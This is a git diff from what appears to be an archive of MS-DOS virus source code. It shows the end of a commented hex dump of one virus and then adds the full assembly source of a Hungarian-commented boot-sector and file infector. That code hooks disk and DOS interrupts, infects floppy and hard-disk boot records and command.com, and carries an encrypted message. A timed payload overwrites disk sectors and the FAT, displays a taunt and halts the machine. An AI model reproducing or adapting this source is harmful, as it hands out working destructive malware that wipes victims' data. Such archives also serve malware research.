.%..!!......)... +;0410 26 27 00 2E FF 2E 23 00-33 C9 B8 01 43 CD 21 B4 &'....#.3I8.CM!4 +;0420 41 CD 21 B8 00 4B 9D 2E-FF 2E 17 00 2E 80 3E 0E AM!8.K........>. +;0430 00 01 74 E4 2E C7 06 70-00 FF FF 2E C7 06 8F 00 ..td.G.p....G... +;0440 00 00 2E 89 16 80 00 2E-8C 1E 82 00 50 53 51 52 ............PSQR +;0450 56 57 1E 06 FC 8B FA 32-D2 80 7D 01 3A 75 05 8A VW..|.z2R.}.:u.. +;0460 15 80 E2 1F B4 36 CD 21-3D FF FF 75 03 E9 77 02 ..b.46M!=..u.iw. +;0470 F7 E3 F7 E1 0B D2 75 05-3D 10 07 72 F0 2E 8B 16 wcwa.Ru.=..rp... +;0480 80 00 1E 07 32 C0 B9 41-00 F2 AE 2E 8B 36 80 00 ....2@9A.r...6.. +;0490 8A 04 0A C0 74 0E 3C 61-72 07 3C 7A 77 03 80 2C ...@t...s&u. +;0520 B4 3E CD 21 E9 C0 01 B8-24 35 CD 21 89 1E 1B 00 4>M!i@.8$5M!.... +;0530 8C 06 1D 00 BA 1B 02 B8-24 25 CD 21 C5 16 80 00 ....:..8$%M!E... +;0540 33 C9 B8 01 43 CD 21 72-3B 2E 8B 1E 70 00 B4 3E 3I8.CM!r;...p.4> +;0550 CD 21 2E C7 06 70 00 FF-FF B8 02 3D CD 21 72 24 M!.G.p...8.=M!r$ +;0560 2E A3 70 00 8C C8 8E D8-8E C0 8B 1E 70 00 B8 00 .#p..H.X.@..p.8. +;0570 57 CD 21 89 16 74 00 89-0E 76 00 B8 00 42 33 C9 WM!..t...v.8.B3I +;0580 8B D1 CD 21 72 3D 80 3E-4E 00 00 74 03 EB 57 90 .QM!r=.>N..t.kW. +;0590 BB 00 10 B4 48 CD 21 73-0B B4 3E 8B 1E 70 00 CD ;..4HM!s.4>..p.M +;05A0 21 E9 43 01 FF 06 8F 00-8E C0 33 F6 8B FE B9 10 !iC......@3v.~9. +;05B0 07 F3 A4 8B D7 8B 0E 11-00 8B 1E 70 00 06 1F B4 .s$.W......p...4 +;05C0 3F CD 21 72 1C 03 F9 33-C9 8B D1 B8 00 42 CD 21 ?M!r..y3I.Q8.BM! +;05D0 BE 05 00 B9 05 00 F3 2E-A4 8B CF 33 D2 B4 40 CD >..9..s.$.O3R4@M +;05E0 21 72 0D E9 BC 00 B9 1C-00 BA 4F 00 B4 3F CD 21 !r.i<.9..:O.4?M! +;05F0 72 4A C7 06 61 00 84 19-A1 5D 00 A3 45 00 A1 5F rJG.a...!].#E.!_ +;0600 00 A3 43 00 A1 63 00 A3-47 00 A1 65 00 A3 49 00 .#C.!c.#G.!e.#I. +;0610 A1 53 00 83 3E 51 00 00-74 01 48 F7 26 78 00 03 !S..>Q..t.Hw&x.. +;0620 06 51 00 83 D2 00 05 0F-00 83 D2 00 25 F0 FF A3 .Q..R.....R.%p.# +;0630 7C 00 89 16 7E 00 05 10-07 83 D2 00 72 3A F7 36 |...~.....R.r:w6 +;0640 78 00 0B D2 74 01 40 A3-53 00 89 16 51 00 A1 7C x..Rt.@#S...Q.!| +;0650 00 8B 16 7E 00 F7 36 7A-00 2B 06 57 00 A3 65 00 ...~.w6z.+.W.#e. +;0660 C7 06 63 00 C5 00 A3 5D-00 C7 06 5F 00 10 07 33 G.c.E.#].G._...3 +;0670 C9 8B D1 B8 00 42 CD 21-72 0A B9 1C 00 BA 4F 00 I.Q8.BM!r.9..:O. +;0680 B4 40 CD 21 72 11 3B C1-75 18 8B 16 7C 00 8B 0E 4@M!r.;Au...|... +;0690 7E 00 B8 00 42 CD 21 72-09 33 D2 B9 10 07 B4 40 ~.8.BM!r.3R9..4@ +;06A0 CD 21 2E 83 3E 8F 00 00-74 04 B4 49 CD 21 2E 83 M!..>...t.4IM!.. +;06B0 3E 70 00 FF 74 31 2E 8B-1E 70 00 2E 8B 16 74 00 >p..t1...p....t. +;06C0 2E 8B 0E 76 00 B8 01 57-CD 21 B4 3E CD 21 2E C5 ...v.8.WM!4>M!.E +;06D0 16 80 00 2E 8B 0E 72 00-B8 01 43 CD 21 2E C5 16 ......r.8.CM!.E. +;06E0 1B 00 B8 24 25 CD 21 07-1F 5F 5E 5A 59 5B 58 9D ..8$%M!.._^ZY[X. +;06F0 2E FF 2E 17 00 00 00 00-00 00 00 00 00 00 00 00 ................ +;0700 4D 00 00 0F 00 00 00 00-00 00 00 00 00 00 00 00 M............... +;0710 CD 20 0B 1B 00 9A F0 FE-1D F0 2F 01 0E 0A 3C 01 M ....p~.p/...<. +;0720 0E 0A EB 04 0E 0A 0E 0A-01 01 01 00 02 FF FF FF ..k............. +;0730 FF FF FF FF FF FF FF FF-FF FF FF FF DD 0A 0C 16 ............]... +;0740 52 0B 14 00 18 00 52 0B-FF FF FF FF 00 00 00 00 R.....R......... +;0750 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +;0760 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 M!K.......... +;0770 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 ..... +;0780 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........ +;0790 00 0D 62 3A 0D 62 6F 2E-2A 20 62 3A 0D 00 00 00 ..b:.bo.* b:.... +;07A0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 01 00 ................ +;07B0 17 D0 01 00 01 00 17 D0-01 00 01 00 17 D0 02 00 .P.....P.....P.. +;07C0 01 00 17 D0 02 00 01 00-87 CF 00 00 05 00 FF FF ...P.....O...... +;07D0 EA CF 01 00 17 D0 07 00-01 00 6C 15 08 25 A5 FE jO...P....l..%%~ +;07E0 BC 07 1E 02 10 07 6C 15-8E 17 2F 01 04 7F 70 00 <.....l.../...p. +;07F0 10 07 40 00 82 08 88 17-A5 16 1B 02 8E 17 02 02 ..@.....%....... +;0800 4D 15 18 05 00 00 00 00-00 00 00 00 00 00 00 00 M............... +;<<<<<<<<<< ORIGINAL CODE BEGINS HERE +;0810 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0820 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0830 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0840 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0850 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0860 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0870 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0880 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0890 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08A0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08B0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08C0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08D0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08E0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08F0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0900 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;>>>>>>>>>> ORIGINAL CODE ENDS HERE +;0910 4D 73 44 6F 73 +;-----------------------------------------------------------------------; + END + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.virusa.asm b/MSDOS/Virus.MSDOS.Unknown.virusa.asm new file mode 100644 index 00000000..b113a6af --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.virusa.asm @@ -0,0 +1,1204 @@ +start segment + assume cs:start,ds:start + org 100h +boot equ 0f00h +kezd: db 52h,24h + jmp hideg + nop + jmp meleg + nop + jmp tamad +veg1: dw 0 +kezd1: dw 0 +meleg: pop si + pop ds + pop [si] + pop [si+2] + mov si,boot + mov di,7c00h + push cs + pop ds + xor ax,ax + mov es,ax + mov cx,100h + pushf + cld + rep movsw + popf +ok1: db 0eah,00,7ch,0,0 +hideg: xor ax,ax + push si + push di + push cx + cld + mov di,offset flag1 + mov si,offset flagv +awq: stosb + cmp di,si + jc awq + pop cx + pop di + pop si + mov es,ax + mov ax,es:word ptr [4ch] + mov cs:word ptr [int13+1],ax + mov ax,es:word ptr [4eh] + mov cs:word ptr [int13+3],ax + mov ax,offset it13 + mov es:word ptr [4ch],ax + mov es:[4eh],cs + mov ax,es:word ptr [84h] + mov cs:word ptr [int21+1],ax + mov ax,es:word ptr [86h] + mov cs:word ptr [int21+3],ax + mov ax,0f000h + mov es,ax + mov al,es:byte ptr[0fff0h] + cmp al,0eah + jnz meleg + mov ax,es:word ptr[0fff1h] + mov cs:word ptr [reset+1],ax + mov ax,es:word ptr[0fff3h] + mov cs:word ptr [reset+3],ax + jmp meleg +int13: db 0eah,0,0,0,0 +int21: db 0eah,0,0,0,0 +int40: db 0eah,0,0,0,0 +flag1: db 0 +flag2: db 0 +flag3: db 0 +flag4: dw 0 +flag5: db 0 +flagv db 0 +egys: db 0 +sub13: cmp dl,0 + jz sub40 +visx: pushf + push cs + mov dl,cs:byte ptr [egys] + call int13 + ret +sub40: push ax + mov al,cs:byte ptr [flag5] + cmp al,80 + pop ax + jmp visx + pushf + push cs + call int40 + ret +subru: push ax + push cx + push dx + push ds + xor ax,ax + mov ds,ax + mov ax,ds:word ptr [78h] + mov cs:word ptr [int1e],ax + mov ax,ds:word ptr [7ah] + mov cs:word ptr [int1e+2],ax + mov al,cs:byte ptr [sav] + cmp al,28h + jz dds + mov bx,offset hdtbl + jmp hds +dds: mov bx,offset dstbl + mov cx,offset tb360 + jmp okea +hds: mov ax,cs:word ptr [szekt] + mov cx,offset tb12 + cmp ax,0fh + jz okea + mov cx,offset tb720 + cmp ax,9 + jz okea + mov cx,offset tb14 +okea: mov ds:word ptr [78h],cx + mov ds:word ptr [7ah],cs + pop ds + pop dx + pop cx + pop ax + call sub13 + push ax + push cx + push dx + push ds + pushf + xor ax,ax + mov ds,ax + mov ax,cs:word ptr [int1e] + mov ds:word ptr [78h],ax + mov ax,cs:word ptr [int1e+2] + mov ds:word ptr [7ah],ax + popf + pop ds + pop dx + pop cx + pop ax + ret +sub21: pushf + push cs + call int21 + ret +it21: cmp ah,3dh + jnz fu3e + push bx + push cx + push ax + push dx + push es + push ds + mov bx,dx +cikl1: mov al,[bx] + cmp al,0 + jz veg + inc bx + jmp cikl1 +veg: push si + mov si,offset nev + dec bx + dec si + mov cx,11 +cikl2: mov al,[bx] + or al,20h + cmp al,cs:[si] + jz nem4 + jmp nem1 +nem4: dec si + dec bx + loop cikl2 + pop si + pop ds + pop es + pop dx + pop ax + pop cx + pop bx + call sub21 + jnc igen1 + retf 2 +igen1: mov cs:word ptr [flag4],ax +nem2: clc + retf 2 +fu3e: cmp ah,3eh + jz aah + jmp int21 +aah: cmp bx,cs:word ptr [flag4] + jz folyt8 + jmp int21 +folyt8: cmp cs:word ptr [flag4],0 + jnz folyt9 + jmp int21 +folyt9: mov cs:word ptr [flag4],0 + call sub21 + push ds + push es + push ax + push bx + push cx + push dx + mov cs:byte ptr [fo],0 +ujfo: mov bx,200h + mov ah,48h + call sub21 + cmp bx,200h + jnc fogl +nem3: pop dx + pop cx + pop bx + pop ax + pop es + pop ds + retf 2 +fo: db 0 +fogl: push ax + and ax,0fffh + cmp ax,0db0h + jc okes1 + pop ax + cmp cs:byte ptr [fo],3 + jz nem3 + inc cs:byte ptr [fo] + jmp ujfo +okes1: pop ax +okes: mov es,ax + mov cs:word ptr [szegm],ax + mov si,0 + mov di,0 + mov cx,1000h + push cs + pop ds + pushf + cld + rep movsw + popf + xor ax,ax + mov ds,ax + mov ax,0 + mov ds,ax + mov ax,offset it21 + mov dx,cs + mov bx,0 + mov cx,0fff0h +tovabb: call keres + jnz nincs + push ax + mov ax,cs:word ptr [int21+1] + mov ds:word ptr [bx],ax + mov ax,cs:word ptr [int21+3] + mov ds:word ptr [bx+2],ax + pop ax + jmp tovabb +reset: db 0eah,0f0h,0ffh,0,0f0h +nincs: mov ax,offset it13 + mov dx,cs + mov bx,0 + mov cx,0fff0h +tovab1: call keres + jnz kil2 + push ax + mov ax,es + mov ds:word ptr [bx+2],ax + pop ax + jmp tovab1 +kil2: mov ax,0 + mov ds,ax + mov ax,ds:word ptr [100h] + mov es:word ptr [int40+1],ax + mov ax,ds:word ptr [102h] + mov es:word ptr [int40+3],ax + call beszur + mov ax,offset it40 + jmp nem3 + mov ds:word ptr [100h],ax + mov ax,es + mov ds:word ptr [102h],ax + mov es:byte ptr [flag5],80 + jmp nem3 +keres: push ax + push dx +ker1: cmp word ptr[bx],ax + jz van1 +nincs1: inc bx + loop ker1 + inc cx +kil1: pop dx + pop ax + ret +van1: cmp word ptr [bx+2],dx + jnz nincs1 + jmp kil1 +nem1: pop si + pop ds + pop es + pop dx + pop ax + pop cx + pop bx + jmp int21 + db 'command.com' +nev: db 0 +it13: push bx + push ax + push cx + push dx + push es + push ds + push di + push si + push cs + pop ds + push cx + push ax + push dx + mov bx,offset atir + mov cx,2 +erdf: call ftr + jc poiu + loop erdf + jmp reset +ftr: mov al,90h + clc + mov [bx],al +atir: stc + nop + nop + nop + nop + nop + nop + nop + mov al,0f9h + mov [bx],al + ret +poiu: pop dx + pop ax + pop cx + cmp cs:byte ptr [mod1],1 + jnz awsw + jmp leol +awsw: mov cs:byte ptr [egys],dl + cmp ah,2 + jc aab + cmp ah,4 + jnc aab + cmp cx,3 + jnc aab + cmp dh,0 + jnz aab + mov cs:byte ptr [flag3],80h +aab: mov al,cs:byte ptr [flag1] + cmp al,80h + jz ugr1 + xor ax,ax + mov es,ax + mov ax,es:word ptr [84h] + cmp ax,cs:word ptr [int21+1] + jz tov1 + jmp dos +tov1: mov ax,es:word ptr [86h] + cmp ax,cs:word ptr [int21+3] + jz ugr1 + jmp dos +ugr1: cmp di,55aah + jnz norm + cmp si,5aa5h + jnz norm + pop si + mov si,0a55ah + push si +norm: cmp dl,20h + jc lemeza + cmp dl,80h + jz win +fdg: jmp kilep +win: jmp wincsi +it40: jmp int40 +lemeza: mov al,cs:byte ptr [flag3] + cmp al,80h + jz lcsere + cmp ah,5 + jnz haha1 +haha2: mov cs:byte ptr [flag3],84h + jmp haha +haha1: cmp al,0 + jz haha + dec cs:byte ptr [flag3] +haha: jmp kilepo +hah1: call sub13 + jnc viter1 +idt: cmp ah,6 + jnz viter + mov cs:byte ptr [flag3],80h +viter: stc +viter1: retf 2 +lcsere: mov cs:byte ptr [flag2],0 + cmp ah,5 + jz haha2 + mov cx,3 +cikl7: push cx + mov cs:byte ptr [flag3],0 + mov bx,boot+200h + mov ax,201h + mov cx,1 + mov dx,0 + push cs + pop es + call sub13 + pop cx + jnc ugr4 + loop cikl7 + jmp kilep +ugr4: push cs + pop ds + mov bx,boot+200h + mov cx,200h + mov ax,0cdfbh + mov dx,7213h + call keres + jz folyt1 + jmp kilep +folyt1: mov cs:byte ptr [fert],1 + mov ax,[bx+5] + cmp ax,12cdh + mov cs:word ptr [cime],bx + mov cs:word ptr[wax],308h + jz foi + jmp folyt2 +foi: mov al,cs:[bx+5+offset ver1-offset kezd2] + cmp al,23 + jnz meh + mov ax,cs:[bx+6+offset ver1-offset kezd2] + cmp ax,word ptr ver1+1 + jnc kilepo +meh: mov cs:word ptr [wax],307h + jmp folyt2 +fert: db 0,0 +kilepo: pop si + pop di + pop ds + pop es + pop dx + pop cx + pop ax + pop bx + cmp dh,0 + jz ugs + jmp hah1 +ugs: cmp cx,1 + jz bout1 + jmp hah1 +bout1: cmp ah,2 + jz bout + cmp ah,3 + jz save + jmp hah1 +bout: call sub13 + jnc ada + jmp idt +ada: cmp cs:byte ptr [flag1],80h + jz ase + jmp hah1 +ase: push si + pushf + mov si,offset bot1 + call ase1 + popf + pop si + jmp viter1 +save: cmp cs:byte ptr [fert],1 + jz save2 + jmp kif +save2: mov cs:byte ptr [fert],0 + push bx + push ax + push cx + push dx + push es + push ds + push di + push si + push es + pop ds + push cs + pop es + mov cx,200h + mov si,bx + mov di,offset boot+200h + rep movsb + jmp folyt3 +kif: pop bx + pop cx + pop cx + pop dx + pop es + pop ds + pop di + pop si + clc + jmp viter1 +ase1: push bx + push ax + push cx + push dx + push di + push ds + push cs + pop ds + mov ax,cs:word ptr [cime] + and ax,0ffh + add bx,ax + mov di,bx + mov cx,59h + pushf + cld + rep movsb + popf + pop ds + pop di + pop dx + pop cx + pop ax + pop bx + clc + ret +folyt2: mov bx,boot+200h + mov ax,301h + mov cx,1 + mov dx,0 + push cs + pop es + call sub13 + jnc folyt3 + jmp kilep +folyt3: push cs + pop ds + mov bx,boot+200h + mov ax,[bx+18h] + mov cs:word ptr [szekt],ax + mov cx,[bx+1ah] + mul cx + mov cx,ax + mov ax,[bx+13h] + mov dx,0 + div cx + mov cs:byte ptr [sav],al + mov ch,al + mov al,1 +ugr3: nop + mov cl,5 + mov ah,5 + push cs + pop es + mov dx,0 + push cx + cmp cs:word ptr [wax],307h + clc + jz waxi + cmp cs:byte ptr [fert],0 + clc + jz waxi + call subru +waxi: push ds + push ax + pop ax + pop ds + pop cx + jnc jo4 + jmp kilep +sav: db 0 +wax: dw 0 +szekt: dw 0 +jo4: mov si,boot+200h + mov di,boot + push cs + pop ds + push cx + mov cx,100h + pushf + cld + rep movsw + popf + pop cx + push cx + mov ax,cs:word ptr [wax] + mov dx,0 + mov cl,1 + mov bx,100h + cmp cs:byte ptr [fert],0 + clc + jz hoho + call sub13 +hoho: pop cx + jnc jo2 + jmp kilep +jo2: push cs + pop ds + push cx + mov bx,boot+200h + mov ax,0cdfbh + mov dx,7213h + mov cx,200h + call keres + pop cx + jz jo3 + jmp kilep +jo3: push bx + push cx + mov cx,100h + mov ax,0e432h + mov dx,16cdh + call keres + jz jo5 + pop cx + pop bx + jmp kilep +jo5: sub bx,6 + mov cs:word ptr [veg1],bx + pop cx + pop bx + add bx,5 + mov cs:word ptr [kezd1],bx + mov cs:byte ptr [fej+2],ch + push cx + mov si,offset kezd2 + mov bx,cs:word ptr [kezd1] + mov cx,offset veg2-offset kezd2 + push cs + pop ds +cikl9: mov al,[si] + mov [bx],al + inc bx + inc si + loop cikl9 +cikl10: mov ds:byte ptr [bx],90h + inc bx + cmp bx,cs:word ptr [veg1] + jc cikl10 + pop cx + mov cx,3 +wqe: push cx + mov cx,1 + mov dx,0 + mov ax,301h + mov bx,boot+200h + push cs + pop es + call sub13 + jc kikk + pop cx + cmp cs:byte ptr [fert],0 + jnz kig + jmp kif +kig: jmp kilepo +kikk: pop cx + loop wqe + jmp kilep +dos: nop + mov al,80h + mov cs:byte ptr [flag1],al + mov ax,es:word ptr [84h] + mov cs:word ptr [int21+1],ax + mov ax,es:word ptr [86h] + mov cs:word ptr [int21+3],ax + mov ax,offset it21 + mov es:word ptr [84h],ax + mov es:[86h],cs +kilep: pop si + pop di + pop ds + pop es + pop dx + pop cx + pop ax + pop bx + jmp int13 +tamad: push cs + pop ds + mov cs:word ptr [szama],28800 + xor ax,ax + push si + push di + push cx + cld + mov di,offset flag1 + mov si,offset flagv +alsk: stosb + cmp di,si + jc alsk + pop cx + pop di + pop si + mov es,ax + mov cs:byte ptr[flag1],80h + mov ax,es:word ptr [4ch] + mov cs:word ptr [int13+1],ax + mov ax,es:word ptr [4eh] + mov cs:word ptr [int13+3],ax + mov ax,offset it13 + mov es:word ptr[4ch],ax + mov es:word ptr[4eh],cs + mov ax,201h + mov bx,offset boot+400h + push cs + pop es + mov dx,180h + mov cx,1 + int 13h + mov ax,0 + mov es,ax + mov ax,cs:word ptr [int13+1] + mov es:word ptr[4ch],ax + mov ax,cs:word ptr [int13+3] + mov es:word ptr[4eh],ax + mov ax,0f000h + mov es,ax + mov al,es:byte ptr [0fff0h] + cmp al,0eah + jnz akdj + mov ax,es:word ptr [0fff1h] + mov cs:word ptr [reset+1],ax + mov ax,es:word ptr [0fff3h] + mov cs:word ptr [reset+3],ax +akdj: retf +kezd2: int 12h + mov bx,40h + mul bx + sub ax,1000h + mov es,ax + mov dx,0 + jmp fej +ver1: db 23,0,6 +fej: mov cx,2801h + mov ax,208h + mov bx,100h + push bx + cmp es:word ptr [bx],2452h + jz el1 + int 13h + pop bx + jc veg2 + push es + mov ax,102h +el2: push ax + retf +el1: mov bx,0f00h + mov al,1 + mov cl,8 + int 13h + pop bx + jc veg2 + push es + mov ax,105h + jmp el2 +veg2: nop + nop +wincsi: jmp aba +aasw: mov al,cs:byte ptr [flag2] + cmp al,80h + jz cxz + jmp kilep +cxz: pop si + pop di + pop ds + pop es + pop dx + pop cx + pop ax + pop bx + cmp ch,0 + jz acb + jmp abbb +acb: cmp cl,0ah + jc acd + jmp abbb +acd: cmp dh,0 + jz ace + jmp abbb +ace: cmp ah,3 + jnz abe + mov cs:byte ptr [flag2],0 +abb: push ax + push bx + push cx + push dx + mov dx,80h + mov ax,201h + mov cx,9 + mov bx,offset boot+200h + push es + push cs + pop es + mov dx,80h + call sub13 + jc aca + mov ax,301h + mov cx,1 + mov dx,80h + mov bx,offset boot+200h + call sub13 +aca: pop es + pop dx + pop cx + pop bx + pop ax +abbb: call sub13 + jmp viter1 +abe: cmp ah,2 + jnz abbb + push di + push cx + push dx + push bx + push ax + push ax + mov ah,0 + mov di,ax + pop ax +abj: push cx + cmp cl,1 + jnz abh + mov cl,9 + jmp abi +abh: mov cx,0ah +abi: push bx + push di + mov al,1 + push es + mov ah,2 + call sub13 + pop es + pop di + pop bx + pop cx + jc abk + add bx,200h + mov cl,2 + dec di + jnz abj + pop ax + mov ah,0 + pop bx + pop dx + pop cx + pop di + clc + jmp viter1 +abk: pop bx + pop bx + pop dx + pop cx + pop di + mov al,0 + jmp viter1 +aba: mov al,cs:byte ptr [flag2] + cmp al,80h + jnz abc + jmp aasw +abc: cmp al,40h + jnz abw + jmp aasw +abw: mov cx,3 +ckld: push cx + mov dx,80h + mov cx,1 + mov bx,offset boot + mov ax,201h + push cs + pop es + call sub13 + pop cx + jnc abdq + loop ckld +kias: jmp aasw +abdq: mov dx,180h + mov cx,1 + mov bx,offset boot+200h + mov ax,201h + push cs + pop es + call sub13 + jc kias + mov bx,offset boot+200h + mov ax,cs:[bx+1feh] + cmp ax,0aa55h + jz abd + mov cs:byte ptr [flag2],40h + jmp kias +abd: push cs + pop ds + mov cx,3 + mov bx,offset boot + mov si,offset kezd3 +kere: mov al,[bx] + cmp al,[si] + jnz nem9 + inc bx + inc si + loop kere + sub bx,3 + add bx,offset ver2-kezd3 + mov al,[bx] + cmp al,23 + jnz nemq + mov ax,[si+offset ver2-offset kezd3] + cmp ax,[bx+1] + jc nemr +nemq: mov ax,307h + jmp nemw +nemr: mov cs:byte ptr [flag2],80h + jmp aasw +nem9: mov ax,308h +nemw: mov dx,80h + mov cx,2 + mov bx,100h + call sub13 + jnc oby + jmp aasw +oby: mov si,offset kezd3 + mov cx,offset veg3-offset kezd3 + mov di,offset boot + pushf + cld + rep movsb + popf + mov ax,301h + mov dx,80h + mov cx,01h + mov bx,offset boot + call sub13 + mov cs:byte ptr [flag2],80h + jmp aasw +kezd3: int 12h + mov bx,40h + mul bx + sub ax,1000h + mov es,ax + xor ax,ax + jmp ugas +ver2: db 23,0,6 +ugas: mov ss,ax + mov sp,7c00h + mov dx,80h + mov cx,02h + mov ax,208h + mov bx,100h + push bx + cmp es:word ptr [bx],2452h + jz el11 + int 13h + pop bx + jc vege + push es + mov ax,102h +el21: push ax + retf +el11: mov bx,0f00h + mov al,1 + mov cl,9 + int 13h + pop bx + jc vege + push es + mov ax,105h + jmp el21 +vege: jmp vege ;szoveg kiiratasa +veg3: nop + nop +cime: dw 0 +bot1: sti + int 13h + db 72h,67h + mov al,ds:[7c10h] + cbw + mul ds:word ptr [7c16h] + add ax,ds:[7c1ch] + add ax,ds:[7c0eh] + mov ds:[7c3fh],ax + mov ds:[7c37h],ax + mov ax,20h + mul ds:word ptr [7c11h] + mov bx,ds:[7c0bh] + add ax,bx + dec ax + div bx + add ds:[7c37h],ax + mov bx,0500h + mov ax,ds:[7c3fh] + db 0e8h,09fh,0 + mov ax,201h + db 0e8h,0b3h,0,72h,19h + mov di,bx + mov cx,0bh + mov si,7dd6h + repz cmpsb + db 75h,0dh + lea di,ds:[bx+20h] + mov si,7d1eh + mov cx,0bh + repz movsb + db 74h,18h + db 0,0,0,0,0,0,0,0,0,0,0,0 +tb12: db 0dfh,2,25h,2,0fh,1bh,0ffh,54h,0f6h,0fh,8,4fh,0,4 +tb720: db 0d1h,2,25h,2,9,2ah,0ffh,50h,0f6h,0fh,4,4fh,80h,5 +tb360: db 0dfh,2,25h,2,9,23h,0ffh,50h,0f6h,0fh,8,27h,40,3 +tb14: db 0a1h,2,25h,2,12h,1bh,0ffh,60h,0f6h,0fh,4,4fh,0,7 +int1e: dw 0,0,0,0,0,0,0,0 +hdtbl: db 50h,0,1,2,50h,0,2,2,50h,0,3,2,50h,0,4,2,50h,0,5,2,50h,0,6,2,50h,0,7,2,50h,0,8,2,50h,0,9,2,50h,0,0ah,2,50h,0,0bh,2,50h,0,0ch,2,50h,0,0dh,2,50h,0,0eh,2 + db 50h,0,0fh,2,50h,0,10h,2,50h,0,11h,2,50h,0,11h,2,50h,0,12h,2 +dstbl: db 28h,0,1,2,28h,0,2,2,28h,0,3,2,28h,0,4,2,28h,0,5,2,28h,0,6,2,28h,0,7,2,28h,0,8,2,28h,0,9,2 +mod2: db 0 +mod1: db 0 +beszur: push ax + push bx + push cx + push dx + push es + push ds + push di + push si + mov ax,201h + mov cx,0ah + mov bx,offset boot + mov dx,80h + push cs + pop es + pushf + push cs + call int13 + mov es,cs:word ptr [szegm] + mov es:word ptr [mod2],0 + jc hib + mov ax,cs:word ptr [boot] + cmp al,23h + jnz hib + mov es:byte ptr [mod2],ah + jmp hib +hib: mov es,cs:word ptr[szegm] + mov bx,offset kiiras + mov cx,offset kiirv-offset kiiras + mov al,es:[bx] + cmp al,20h + jnz hib1 +cijk: mov al,es:[bx] + xor al,45h + mov es:[bx],al + inc bx + loop cijk +hib1: mov ch,25h + mov ah,4 + int 1ah + jc friss + cmp cl,89h + jc friss + cmp ch,25h + jz bete + cmp dh,7 + jnc bete + jmp nbete +friss: mov al,54h + out 43h,al + mov al,0ffh + out 41h,al + jmp nbete +bete: cmp es:byte ptr [mod2],2 + jz nbete + mov ax,0 + mov ds,cs:word ptr [szegm] + mov es,ax + mov ax,es:word ptr[70h] + mov ds:word ptr [tim+1],ax + mov ax,es:word ptr[72h] + mov ds:word ptr [tim+3],ax + mov ax,offset timer + mov es:word ptr [70h],ax + mov ax,cs:word ptr [szegm] + mov es:word ptr [72h],ds +nbete: pop si + pop di + pop ds + pop es + pop dx + pop cx + pop bx + pop ax + ret +szegm: dw 0,0 +tim: db 0eah,0,0,0,0,0 +szama: dw 28800 +timer: pushf + push ax + push bx + push cx + push dx + push ds + push cs + pop ds + mov cx,2 + mov bx,offset atir + mov al,cs:[bx] + cmp al,90h + jnz rwt + jmp reset +rwt: call ftr + jc rwe + loop rwt + jmp reset +rwe: pop ds + mov ax,cs:word ptr [szama] + dec ax +kii: mov cs:word ptr [szama],ax + jz gyilk1 + pop dx + pop cx + pop bx + pop ax + popf + jmp tim +gyilk1: mov ax,28800 + mov cs:byte ptr [mod1],1 + inc ax + jmp kii +leol: mov bx,offset kiiras + mov cx,offset kiirv-offset kiiras + mov al,cs:[bx] + cmp al,20h + jz leol1 +adla: mov al,cs:[bx] + xor al,45h + mov cs:[bx],al + inc bx + loop adla +leol1: push cs + pop ds + cmp cs:byte ptr [mod2],1 + jz atu +irtas: mov si,offset graf + mov di,offset boot + mov cx,128 + mov dl,4*9 + push cs + pop es + push cs + pop ds + cld +cvgh: rep movsb + sub si,128 + mov cx,128 + dec dl + jnz cvgh + mov dx,180h + mov ax,309h + mov cx,2 + mov bx,offset boot + pushf + push cs + call int13 + mov dx,280h + mov ax,309h + mov cx,2 + mov bx,offset boot + pushf + push cs + call int13 + mov dx,0 + mov ax,309h + mov cx,1 + mov bx,offset boot + pushf + push cs + call int13 +atu: mov si,offset kiiras + mov al,2 + mov ah,0 + int 10h +awqt: mov al,cs:[si] + cmp al,0 + jz kie + mov ah,0eh + mov bx,0 + push si + int 10h + pop si + inc si + jmp awqt +kie: cli + hlt + jmp kie +kiiras: db ' Haha,vrus van a gpben!!',0dh,0ah,'Ez egy eddig mg nem kzismert vrus. De hamarosan az lesz.' + db 0dh,0ah,'A neve egyszeren tltget ',0dh,0ah,'Ezt a nevt onnan kapta, hogy' + db ' feltltgeti a FAT-tblt klnbz alakzatokkal.',0dh,0ah + db 'Ez mr meg is trtnt !!! 